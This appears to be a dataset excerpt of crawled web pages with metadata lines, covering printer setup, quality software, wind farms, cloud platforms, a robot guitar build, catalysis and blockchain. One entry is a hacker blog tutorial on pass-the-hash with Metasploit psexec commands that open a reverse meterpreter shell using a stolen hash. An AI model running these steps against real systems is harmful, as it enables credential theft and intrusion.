Menu On Printer Panel: Most Brother printers have menu buttons. Taking the Brother MFC-L2820DW printer as an example, you can select the "Settings" or "Menu" options on the printer’s control panel. Use the arrow keys to navigate the "Network" or "Network Settings" menu. Search for the "TCP/IP" or "IP address" options in the network settings menu. After selecting this option, you should be able to see the printer’s IP address. This method also works for finding the IP address of your Brother MFC-L3710CW printer. Printer Configuration Page: Some Brother printers allow you to search for IP addresses by printing the configuration page. You can find instructions on printing this page on the printer panel. Taking Brother HL-L6210DW printer as an example, first, ensure that the printer is turned on and the paper is loaded. Next, press the up or down icon to select the [Print Report] option, then press OK. Then press the up or down icon to select [Network Configuration]. Finally, press OK and Go. Usually, this page provides detailed information about printer network settings, including IP addresses. This method also works for finding the IP address of your Brother HL-L3210CW, HL-L3230CDW, HL-L3290CDW printers. Using Brother Printer Software: If you have installed the relevant software for Brother printers, you can open the software on your computer and look for options related to printer connection. Usually, the software will display the IP address of the printer. 1. Navigate from the Windows Start menu to the Control Panel after connecting the printer via USB. 2. In the "Hardware and Sound" area, proceed to click "View devices and printers". 3. Locate your printer under "Printers and Faxes," and make sure the right printer is chosen by examining the printer's model name and number. 4. Right-click the printer icon and then choose "Properties" from the menu. 5. In the properties menu, select the "General" tab and look for the "Location" field. The values on the right side of this field correspond to the printer's IP address. 1. Click on "System Preferences" on the Mac main screen. 2. Click to open a new window. Then, search for and click on the "Print and Fax" option in the new window. 3. Locate your printer in the "Printers" tab and verify that you have chosen the correct printer by checking the model and name. 4. After selecting the right printer, select "Options and Consumables". The printer's IP address will appear on the new screen. Router Management Page: If you know the router that connects to the printer, you can log in to the router's management page. On the router management page, search for the list of connected devices or DHCP clients, and you should be able to find the printer's IP address. Record these numbers accurately, no matter which operating system you use to find the printer's IP address. Then, you can use these numbers to configure the printer to run on a dedicated network or to help diagnose future connection issues. However, it is worth noting that these steps may vary depending on the printer model, and the specific steps may vary. If you have a user manual for the printer, it is recommended to consult the manual for detailed guidance. Alternatively, search for relevant information online or contact Brother Printer Support for more assistance. Frequently Asked Questions About Finding Brother Printer IP Address Brother Printer Cannot Connect To The Network? Check Connection: Ensure that the printer and router are properly connected. Check that the printer is linked to the appropriate wireless network. Restart: Try restarting the printer and router. Sometimes, restarting can solve connection problems. Network Settings: Ensure your printer is correctly configured with wireless network settings. You might need to provide the correct network password. Update Driver: Check if the driver for your printer is the latest version. You can download and install the latest drivers on the printer manufacturer's website. Firewalls And Security Software: Check your computer's firewall and security software settings to ensure they do not block printer and network communication. Reset Network Settings: Some printers have a network settings reset option.; You can reset it to the default settings and reconfigure the network connection. Suppose you have tried the above methods but still cannot solve the problem. In that case, it is recommended to consult your printer's user manual or visit the manufacturer's support website for more detailed assistance. Brother Printer Cannot Enter The Settings Interface? 1. Incorrect Gateway Address Configuration: Please verify that the new address entered is valid. You can check to see if input mistakes occurred when modifying the settings. 2. Network Configuration Issue: If the gateway address is changed but the settings interface cannot be reached, the printer's present network configuration may be incompatible with the new gateway address. You can reconnect the printer to the network and verify that it can receive an IP address appropriately. 3. Firewall Or Router Settings: Sometimes, firewall or router settings prevent access to the printer's settings interface. Turn off the firewall or verify the router settings to ensure printer access. If none of the above methods can solve the problem, it is recommended to contact customer support for Brother printers for assistance. Finding the IP address of our brother's printer can help us better manage and use the printer and improve work efficiency. This blog can help you find the IP address of your brother's printer smoothly. If you have any questions or need further assistance, please get in touch with our True Image technical support team anytime. In addition, our True Image offers affordable Brother compatible toner cartridges, such as our Brother TN830 and Brother TN920 monochrome-compatible toner cartridges, as well as our Brother TN-227 and Brother TN229 color-compatible toner cartridges, which have the same quality and performance as the original Brother toner cartridge. They can provide you with excellent printing quality while saving you costs. If needed, True Image is a good choice.
systems_science
http://capamanager.blogspot.com/2012/12/kaizen-software-capa-8d-download.html
2013-06-18T21:38:14
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368707188217/warc/CC-MAIN-20130516122628-00080-ip-10-60-113-184.ec2.internal.warc.gz
0.905082
237
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__63562334
en
Kaizen software manages improvement activity in your businessCAPA Manager Kaizen software automates the routing, notification, delivery, escalation and approval of Kaizen projects within your business and supply chain. It automates the management of entire improvement process, from initiation to investigation and all the way through to closure. The CAPA Manager improvement software links teams and groups regardless of their geographical location. For example, the identification of an improvement opportunity will trigger a process which will allow remote stakeholders to work together on a Kaizen task enabling the required improvements to be implemented quickly and efficiently. Measure improvement activityThe system tracks a diverse range of improvement opportunities, such as customer complaints, audit actions, cost-down opportunities, quality issue and more. CAPA Manager Kaizen software also provides a graphical reporting capability which allows improvement momentum to be measured. Through reports, managers get a real-time view of the CAPA process and can be more proactive about improving their quality system. Download your CAPA data base in csv format for analysis in Minitab, MS excell or more. Using the CAPA data you can build a smart picture of who is improving and who is not.
systems_science
https://idic.org.il/opportunities/searching-for-nl-public-and-private-organisations-to-attend-ai-week-in-israel-17-21-nov-2019
2021-11-30T15:46:14
s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964359037.96/warc/CC-MAIN-20211130141247-20211130171247-00246.warc.gz
0.926264
340
CC-MAIN-2021-49
webtext-fineweb__CC-MAIN-2021-49__0__77530952
en
#51 searching for NL Artificial Intelligence public and private organisations to attend AI week in Israel 17-21 Nov 2019 - Location Tel Aviv - Industry High-tech systems and materials - Online since 2019-11-17 The Israeli-Dutch Innovation Center (IDIC) at the Netherlands embassy in Israel is organising a Dutch delegation to take part at the AI week in Tel Aviv. We are looking for Dutch public and private organisations that are interested in participating in the mission. Please note the conference, open "Call for proposals" on the website. Join the AI Week this November for a 4-day international event with the experts who are reshaping AI innovation. Bringing together 2,000 technologists and featuring over 100 talks, this event is not to be missed. Combining technological leadership, applied AI and academic research, AI Week will highlight the ways in which AI technology is revolutionizing business strategy, policy and future development. Targeting data scientists, data engineers, AI product managers, as well as startups, investors, and policy makers, our conference focuses on every application of AI technology in real-world domains. Including 4 days with 12 tracks and 10 workshops delivered by industry professionals and researchers, AI Week will delve into every domain, including; Computer Vision, Natural Language Processing (NLP), AI Systems, Agriculture, Healthcare, AI Research, Reinforcement Learning, AI Hardware, Automotive, Industrial AI, Cyber, AI in the Enterprise, and AI 101. AI Week is hosted by The Yuval Ne'eman Workshop for Science, Technology and Security and the Blavatnik Interdisciplinary Cyber Research Center at Tel Aviv University, together with Intel.
systems_science
https://arthelius.com/offshore-wind-farms-are-advancing-at-full-speed-with-the-help-of-drones-and-submarines/
2023-03-27T00:04:18
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296946584.94/warc/CC-MAIN-20230326235016-20230327025016-00187.warc.gz
0.947224
1,271
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__242178310
en
Europe aims to reduce the operating costs of offshore wind turbines. Off the coast of Portugal, a team of underwater robots inspects the base of a wind farm’s turbines for signs of damage, while aerial drones check the condition of the blades. This activity is part of a project to reduce inspection costs, keep wind turbines running longer and ultimately lower the price of electricity. Wind energy accounted for more than a third of electricity generated from renewable sources in the EU in 2020 and offshore wind energy is expected to make an increasing contribution in the coming years. Denmark became home to the world’s first offshore wind farm in 1991 and Europe is a world leader in this field. Yet operating wind farms in seas and oceans is expensive and increases the global cost of this clean energy. In addition, Asian companies are gaining ground in the sector, prompting European industry to maintain a competitive edge. “Up to 30% of all operating costs are related to inspection and maintenance,” says João Marques, from the research association of INESC TEC in Portugal. Much of this cost comes from sending maintenance crews on boats to survey and repair offshore wind energy infrastructure. The EU-funded ATLANTIS project is exploring how robots can help with this. The ultimate goal is to reduce the cost of wind energy. Underwater machines, vehicles that move over the water surface and drones are just some of the robots tested. They use a combination of technologies – such as visual and non-visual imaging – and sonar to inspect the infrastructure. For example, infrared imaging can identify cracks in turbine blades. Research conducted by the project suggests that robotics-based technologies could extend the time maintenance vessels can operate on wind farms by approximately 35%. Cost is not the only consideration. “We also have some security issues,” said Marques, senior researcher on the ATLANTIS project. Transferring people from boats to turbine platforms, diving under waves to inspect docking points, and climbing turbine towers are dangerous tasks. It is not safe to move people from boats to turbine platforms until the waves are less than 1.5 meters high. On the contrary, robotic inspection and maintenance systems can be deployed from boats in waves up to 2 meters high. In addition, simpler and safer maintenance will extend the time that wind farms can be fully operational. In winter it is often impossible to carry out offshore inspections and maintenance and you have to wait for better weather conditions in spring or summer. “In a month if there is a problem in a wind farm or in a particular turbine where it is not accessible or not accessible, operations should be halted until someone can get to it,” Marques said. By being able to work in higher waves, the causes of wind farm failures can be tackled more quickly. The first of its kind The project’s test site is based on a real offshore wind farm in the Atlantic Ocean, 20 kilometers from the city of Viana do Castelo, in northern Portugal. It is the first of its kind in Europe. “We need a place to test these things, a place where people can actually develop their own robotics,” he explains. In addition to its own robot technologies, ATLANTIS wants to help other research teams and companies to develop their own systems. European researchers and companies active in this cutting-edge sector should be able to make time to use the facilities from the beginning of this year. Another way to reduce maintenance costs is to reduce damage and the need for repairs in the first place. The recently completed EU-funded FarmConners project sought to do just that through the widespread use of a technology called wind farm control, WFC. When hit by the wind, the turbines extract energy from the airflow. As a result, the airflow at the back of the turbine has less energy, a phenomenon called shading. Due to this uneven distribution of the energy load on the blades and towers, some turbines sustain more damage than others. The WFC aims for a balanced distribution of wind energy across the park, said Tuhfe Göçmen, project coordinator at the Technical University of Denmark. There are several ways to reduce the effects of shadowing. One is the misalignment of the turbines. Instead of facing directly into the wind, a turbine can be rotated slightly so that the shadow effect is offset by the turbines behind it. The pitch and rotational speed of the three turbine blades can also be changed. While reducing the amount of energy the turbine produces, it frees up more energy for processing by the turbines downstream. In addition to reducing wear and tear and maintenance costs, WFC can make wind farms more productive and help them generate power in a way that is easier to connect to the grid. Renewable energy, including wind energy, is often produced with a series of highs (peaks) and lows. Sometimes peaks or spikes can overload the power grid. By making the turbines work together, the power output can be leveled to provide a more consistent and stable input into the power grid, Göçmen said. “If we jointly control the turbines, everything is more efficient,” he said. Research has shown that such control of wind farms could increase the energy production of all wind farms in the EU by 1%. That’s twice as much as a 400-megawatt wind farm, which Gregor Giebel, coordinator of FarmConners at the Technical University of Denmark, said would cost around €1.2 billion to build. This technology is also easy to implement as most wind turbines can be controlled and adapted to WFC use. Wind farms only need to update their operating software. There is a lot of commercial interest in the WFC technology, making it a promising way for Europe to expand the use of wind energy, says Göçmen, It’s a “low cost and high profit potential,” he said. The research in this article was funded by the EU. This article was originally published in Horizon, the EU Journal of Research and Innovation.
systems_science
http://7habitsofhighlyeffectivehackers.blogspot.com/2012/04/passing-hash.html
2024-02-28T05:48:03
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474697.2/warc/CC-MAIN-20240228044414-20240228074414-00533.warc.gz
0.883414
615
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__139220419
en
With Pass-the-hash, a simple un-cracked hash can be used to compromise other systems using the same account. How it works: Once we gain root access to a system, one of the first things we do is grab password hashes, (demonstrated in a previous post), and we typically immediately jump to cracking these hashes. BUT, even an un-cracked hash can be useful. If other systems use the same credentials, we can simply pass the hash along to that system and it will happily accept it and execute code for us. One method for accomplishing this task is to use the Windows Credential Editor (wce). Written by Hernan Ochoa, it is available from www.ampliasecurity.com/research.html This tool essentially allows you to edit the memory space of the running LSASS process, replacing your credentials with your victim's username and hash. You can then interact with other systems using any built in windows tool (net use, reg, psexec), and you'll effectively impersonate the victim. ***Newer versions of the tool even allow you to use stolen Kerberos tokens (with the -k and -K options). Now, there is a simpler method for doing a pass-the-hash attack. Since version 3.1, metasploit has a built in method for it in the psexec exploit. It is VERY EASY, as I'll demonstrate. We're going to use a hash we've gained from target1 (old vulnerable Windows server), to gain access to target2 (windows XPsp3, fully patched). First, we dump target1 hashes using the hashdump command, and we copy off Administrator's hash. Now we start up msfconsole. The exploit we want is psexec, and for a payload we will use a reverse meterpreter shell, so we issue these commands: use windows/smb/psexecWe then set the variables for RHOST (target#2's IP) and LHOST (our IP). set PAYLOAD windows/meterpreter/reverse_tcp set RHOST "target2 IP" set LHOST "Our IP" Now comes the magic. We set the user and password variables. Metasploit will automatically recognize if a hash is used for SMBPass and will use pass-the-hash rather than a password attempt. set SMBUser AdministratorThat's it, run "exploit". set SMBPass 73a87bf2afc9ca49b69e407095566351:1c31f... As you can see, this set up the reverse handler, connected to port 445 on target2, and using the hash we supplied it was able to execute our payload, giving us a meterpreter shell. Because of one unmanaged legacy system, we were able to thoroughly own a completely patched box.
systems_science
https://www.melodic.cloud/melodic-platform/
2024-02-21T10:28:24
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947473472.21/warc/CC-MAIN-20240221102433-20240221132433-00742.warc.gz
0.915052
510
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__11239001
en
Multicloud management platform – single gate to multicloud world MELODIC allows for implementing applications that support various types of components: virtual machines, containers, big data (Apache Spark) platforms and serverless components. MELODIC is integrated with leading cloud service providers: AWS , Azure and Google Cloud Platform , as well as with service providers using OpenStack. Integration with local cloud providers is also being carried out. In addition, unlike Kubernetes, which only allows you to optimize resources within an existing cluster, MELODIC allows you to dynamically add cloud resources as the application needs, as well as delete them when they are not needed.As a result, the use of resources is tailored to the needs of the application and there is no need to maintain an oversized infrastructure Multicloud applications modelling The key element of the platform is based on the TOSCA standard (Topology and Orchestration Specification for Cloud Applications) the CAMEL language (Cloud Application Modeling and Execution Language), allowing to describe app requirements and infrastructure independently of a specific supplier, as well as selecting the most optimal implementation model depending on the characteristics of the application. An additional element of the platform is the ability to optimize Big Data solutions and data locality Awareness. The process of modeling/describing applications in CAMEL language within the Melodic platform first includes defining its components, connections between them, as well as requirements regarding the performance and resources, along with the way of implementing the application. In the next step, the implementation configuration is automatically optimized – the platform “decides” which and where the infrastructure should be used. Cloud computing resources optimization Initial optimization is made on the basis of parameters specified by the user. Optimization is one of the strongest points of the platform. Advanced methods based on Constraint Programming and Reinforcement Learning (Stochastic Learning Automata) are used to solve the optimization problems. MELODIC also includes a unique module for assessing the usability of a business implementation, based on an adaptive usability function. On the basis of a specific, optimal configuration, a precisely defined infrastructure is automatically created for selected cloud service providers (virtual machines with set parameters) and then the application is implemented along with connection settings between components. After implementation, the application is monitored – collected are, among others, metrics defining the characteristics of its operation, which at the same time constitute the basis for automatic optimization of application implementation, basing on the current values of the metrics.
systems_science
https://du2017-grp071-14.blogspot.com/2017/04/week-3-updates.html
2019-06-25T17:33:48
s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627999876.81/warc/CC-MAIN-20190625172832-20190625194832-00213.warc.gz
0.944204
467
CC-MAIN-2019-26
webtext-fineweb__CC-MAIN-2019-26__0__14070183
en
This week, we revised our design and plan for our project. We have decided to go with a bass guitar instead of a lead guitar due to our personal preference, and the fact that we felt it would best fit whatever song the robot orchestra ends up playing. We ordered parts (solenoids, guitar picks, rectifier diodes, 10k resistors, MOSFETs -- full list of what we used will be published when we finish up with the prototyping phase). Throughout the testing phase, from when the solenoids arrived in the mail, research has been done to find how solenoids could be controlled from microcontrollers. The main components needed to use solenoids from the Teensy are MOSFETs, rectifier diodes, and 10k resistors. The solenoids require 12V to operate, but Teensy's only output 3.3V. The most logical way, and most common way to make use of solenoids with Teensy's is to use a MOSFET. In simple terms, a MOSFET is a switch, that allows a current to flow through it when a different current is applied. The two currents do not need to be the same voltage, meaning the MOSFET can allow a 12V signal to pass through when a 3.3V signal is applied (given there is a 12V power source). The differing operating voltages of the Teensy from the solenoids is so great that there is a risk of shorting something on the Teensy. When solenoids return to the OFF state, the remaining electricity has to go somewhere, and that is what can damage the hardware. The role of a rectifier diode is to keep current running in one direction, so having a rectifier diode prevents reverse flow of current, eliminating that risk. The resistors in our circuit help the signals keep a safe current for our MOSFETs. Resistors reduce current flow, and expel of that extra energy in the form of heat. The resistors connect the signal wire from the Teensy to the ground rail of the breadboard, which is also connected to the Teensy ground terminal and the 12V ground.
systems_science
http://detchem.de/mechanisms/palladium.html
2017-12-16T14:55:04
s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948588251.76/warc/CC-MAIN-20171216143011-20171216165011-00466.warc.gz
0.809998
341
CC-MAIN-2017-51
webtext-fineweb__CC-MAIN-2017-51__0__50935285
en
Reaction mechanisms over Palladium 1) Surface reactions: Catalytic combustion of hydrogen on palladium Evaluation:evaluated by comparison between simulated and experimentally determined catalytic ignition temperatures for stagnation point flows on an electrically heated palladium foil. Reference: O. Deutschmann, R. Schmidt, F. Behrendt, J. Warnatz. Proc. Combust. Inst. 26 (1996) 1747-1754. 2) Surface reactions: Catalytic oxidation of methane over reduced palladium Evaluation: evaluated based on experimentally axially space resolved concentration profiles at steady-state for partial and total oxidation of methane within a channel flow reactor over Pd/Al2O3 catalyst at 900 - 1100 K, 1013 mbar, C/O-ratios = 0.8 - 1.1, 80 vol.-% N2 dilution; comparison with experimentally reported light-off profiles in an annular flow reactor (900 - 1200 K) under fuel-lean conditions (C/O-ratio = 0.125) as well as experimentally reported species concentrations over a Pd-foil catalyst under fuel-rich conditions (C/O-ratio = 1.0) at different temperatures (950 - 1200 K). Surface kinetics is thermodynamically consistent for a temperature range 273 – 1400K. Reference:H. Stotz, L. Maier, O. Deutschmann, Methane Oxidation over Palladium: On the Mechanism in Fuel-Rich Mixtures at High Temperatures, Topics in Catalysis: Catalysis and environmental protection, accepted (2016).
systems_science
https://www.blockchainireland.ie/blockchain-not-as-decentralised-as-first-thought-says-new-report/
2024-03-03T18:21:31
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476397.24/warc/CC-MAIN-20240303174631-20240303204631-00736.warc.gz
0.947097
282
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__86832181
en
Distributed ledger technology (DLT) and blockchains, including Bitcoin and Ethereum, may be more vulnerable to centralisation risks than initially thought, according to a report from Trail of Bits. Cointelegraph reports that the a new report from the security firm titled “Are Blockchains Decentralized?”, which was commissioned by the US Defence Advanced Research Projects Agency (DARPA), investigated whether blockchains, like Bitcoin and Ethereum, are truly decentralised, though the report largely focused on Bitcoin. Among its key findings, says Cointelegraph, the security firm found that outdated Bitcoin nodes, unencrypted blockchain mining pools and a majority of unencrypted Bitcoin network traffic traversing over only a limited number of ISPs could leave room for various actors to garner excessive and centralised control over the network. The report states that a subnetwork of Bitcoin nodes is largely responsible for reaching consensus and communicating with miners and that a “vast majority of nodes do not meaningfully contribute to the health of the network.” It also found that 21% of Bitcoin nodes are running an older version of the Bitcoin Core client, which is known to have vulnerability concerns such as consensus errors. It states that “it is vital that all DLT nodes operate on the same latest version of software, otherwise, consensus errors can occur and lead to a blockchain fork.”
systems_science